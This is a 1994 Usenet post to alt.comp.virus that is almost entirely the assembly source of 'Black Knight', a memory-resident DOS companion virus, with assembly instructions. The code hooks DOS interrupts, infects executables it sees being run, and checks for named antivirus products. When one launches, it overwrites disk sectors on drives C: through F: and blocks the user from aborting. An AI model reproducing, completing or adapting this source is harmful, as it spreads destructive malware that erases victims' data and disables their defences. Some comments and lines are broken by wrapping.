From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:43:54 1994
Xref: netcom.com alt.comp.virus:508
Path: netcom.com!ix.netcom.com!netnews
From: Zeppelin@ix.netcom.com (Mr. G)
Newsgroups: alt.comp.virus
Subject: BlackKnight Virus (ANTI AV VIRUS)
Date: 29 Nov 1994 13:09:23 GMT
Organization: Netcom
Lines: 376
Distribution: world
Message-ID: <3bf963$idi@ixnews1.ix.netcom.com>
References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>
NNTP-Posting-Host: ix-pas2-10.ix.netcom.com

;Black Knight Anti-Virus-Virus
;Size - 520
;
;Tasm BKNIGHT
;Tlink /T BKNIGHT
;Memory Resident Companion Virus
;Anti-Anti-Virus 
;Formats Drives C: to F: When Anti-Virus Product Is Ran
;Tempest - _ Of Luxenburg
;

		.radix 16
     cseg       segment
		model  small
		assume cs:cseg, ds:cseg, es:cseg

		org 100h

oi21            equ endit
filelength      equ endit - begin
nameptr         equ endit+4
DTA             equ endit+8

	 




begin:          jmp     virus_install                              

virus_name:            
		db     'Black Knight'
		

						 ;install
virus_install:  
		nop
		nop
		nop
		mov     ax,cs                    ; reduce memory size   
  
		dec     ax                           
		mov     ds,ax                        
		cmp     byte ptr ds:[0000],5a        
		jne     cancel                        
		mov     ax,ds:[0003]                 
		sub     ax,100                        
		mov     ds:0003,ax
Zopy_virus:  
		mov     bx,ax                    ; copy to claimed block 
 
		mov     ax,es                        
		add     ax,bx                       
		mov     es,ax
		mov     cx,offset endit - begin                    
		mov     ax,ds                       
		inc     ax
		mov     ds,ax
		lea     si,ds:[begin]            
		lea     di,es:0100                  
		rep     movsb                       
						    


Grab_21:                                     
		
		mov     ds,cx                   ; hook int 21h
		mov     si,0084h                ; 
		mov     di,offset oi21
		mov     dx,offset check_exec
		lodsw
		cmp     ax,dx                   ;
		je      cancel                  ; exit, if already 
installed
		stosw
		movsw
		
		push    es 
		pop     ds
		mov     ax,2521h                ; revector int 21h to 
virus
		nop
		int     21h
		nop                                

cancel:         ret          

check_exec:     
		pushf

		push    es                     ; push everything onto 
the
		push    ds                     ; stack
		push    ax
		push    bx
		push    dx

		cmp     ax,04B00h               ; is the file being 
		
		
		
		jne     abort                   ; executed?
		
		


					     ;if yes, try the_stinger
do_infect:      call    infect                  ; then try to infect
		
		
			      

abort:                                        ; restore everything
		pop     dx
		pop     bx
		pop     ax
		pop     ds
		pop     es
		popf

Bye_Bye:      
				   ; exit
		jmp     dword ptr cs:[oi21]                     


new_24h:        
		mov     al,3             ; critical error handler
		iret

infect:          
		mov     cs:[name_seg],ds       ; here, the virus 
essentially
		mov     cs:[name_off],dx       ; copies the name of the
		
		cld                            ; loaded file into a 
buffer
		mov     di,dx                  ; so that it can be 
compared
		push    ds                     ; against the default 
names
		pop     es                     ; in the_stinger
		mov     al,'.'                 ; subroutine 
		repne   scasb                  ; <-- 
		
		call    the_stinger            ; check for anti-virus 
load
					       ; and deploy the_stinger
		
		
		
		cld
		mov     word ptr cs:[nameptr],dx
		mov     word ptr cs:[nameptr+2],ds

		mov     ah,2Fh
		int     21h
		push    es
		push    bx

		push    cs

		pop     ds
		mov     dx,offset DTA
		mov     ah,1Ah
		int     21h

		call    searchpoint
		push    di
		mov     si,offset COM_txt

		mov     cx,3
	 rep    cmpsb 
		pop     di
		jz      do_com
		mov     si,offset EXE_txt
		nop
		mov     cl,3
		rep     cmpsb
		jnz     return

do_exe:         mov     si,offset COM_txt
		nop
		call    change_ext
		mov     ax,3300h
		nop
		int     21h
		push    dx

		cwd
		inc     ax
		push    ax
		int     21h

Grab24h:        
		
		mov     ax,3524h         
		int     21h        
		push    bx
		push    es
		push    cs
		pop     ds
		mov     dx,offset new_24h
		mov     ah,25h
		push    ax
		int     21h
		
		
		lds     dx,dword ptr [nameptr]  ;create the virus 
(unique name)
		xor     cx,cx
		mov     ah,05Bh
		int     21
		jc      return1                 
		xchg    bx,ax                   ;save handle
		


		push    cs
		pop     ds
		mov     cx,filelength          ;cx= length of virus
		mov     dx,offset begin        ;where to start copying
		mov     ah,40h                 ;write the virus to the 
		int     21h                    ;new file

		mov     ah,3Eh                 ; close
		int     21h

return1:        pop     ax
		pop     ds
		pop     dx
		int     21h
		
		pop     ax
		pop     dx
		int     21h
		
		mov     si,offset EXE_txt
		call    change_ext
		
return:         mov     ah,1Ah
		pop     dx
		pop     ds
		int      21H

		ret

do_com:         call    findfirst                 
		cmp     word ptr cs:[DTA+1Ah],endit - begin
		jne     return
		mov     si,offset EXE_txt
		call    change_ext
		call    findfirst
		jnc     return
		mov     si,offset COM_txt
		call    change_ext
		jmp     short return

searchpoint:    les     di,dword ptr cs:[nameptr]
		mov     ch,0FFh
		mov     al,0
	 repnz  scasb
		sub     di,4
		ret
change_ext:     call    searchpoint
		push    cs
		pop     ds
		movsw
		movsw
		ret

findfirst:      lds     dx,dword ptr [nameptr]
		mov     cl,27h
		mov     ah,4Eh
		int     21h
		ret
			 
the_stinger:
		cmp     word ptr es:[di-3],'MI'    ;Integrity Master
		je      jumptoass                
		
		cmp     word ptr es:[di-3],'XR'    ;VIRX
		je      jumptoass                
		
		cmp     word ptr es:[di-3],'PO'    ;VIRUSTOP
		jne     next1                     
		cmp     word ptr es:[di-5],'TS'   
		je      jumptoass                

next1:          cmp     word ptr es:[di-3],'VA'    ;AV = CPAV
		je      jumptoass                     
		
		cmp     word ptr es:[di-3],'TO'    ;*prot = F-prot
		jne     next2                
		cmp     word ptr es:[di-5],'RP'  
		je      jumptoass                     

next2:          cmp     word ptr es:[di-3],'NA'    ;*scan = McAfee's 
Scan.
		jne     next3                
		cmp     word ptr es:[di-5],'CS'  
		je      jumptoass                     
		
		cmp     word ptr es:[di-3],'NA'    ;*lean = McAfee's 
CLEAN.
		jne     next3                      ; why not, eh?
		cmp     word ptr es:[di-5],'EL'  
		je      jumptoass                     
next3:          ret                
jumptoass:      jmp     nuke                  ;assassination (deletion)
						; of anti-virus program

		
		
nuke:                
		mov     al,2                   ;Lets Total The C: Drive
		mov     cx,25
		cli                             ; Keeps Victim From 
Aborting
		cwd                          
		int     026h                
		sti                         

		mov     al,3                   ;Lets Total The D: Drive
		mov     cx,25
		cli                             ; Keeps Victim From 
Aborting
		cwd                          
		int     026h                
		sti                         

		mov     al,3                   ;Lets Total The E: Drive
		mov     cx,25
		cli                             ; Keeps Victim From 
Aborting
		cwd                          
		int     026h                
		sti                         


		mov     al,5                   ;Lets Total The F: Drive
		mov     cx,25
		cli                             ; Keeps Victim From 
Aborting
		cwd                          
		int     026h                
		sti                         


EXE_txt         db  'EXE',0
COM_txt         db  'COM',0

 

data_1          db      0
data_2          db      0

last            db     090H
name_seg        dw  ?
name_off        dw  ?

c1              db       0          
c2              db       0          
c3              db       0          
c4              db       0          
c5              db       0          
virus_man:      db      'Tempest - _ Of Luxenburg'
			   
endit:


cseg            ends
		end begin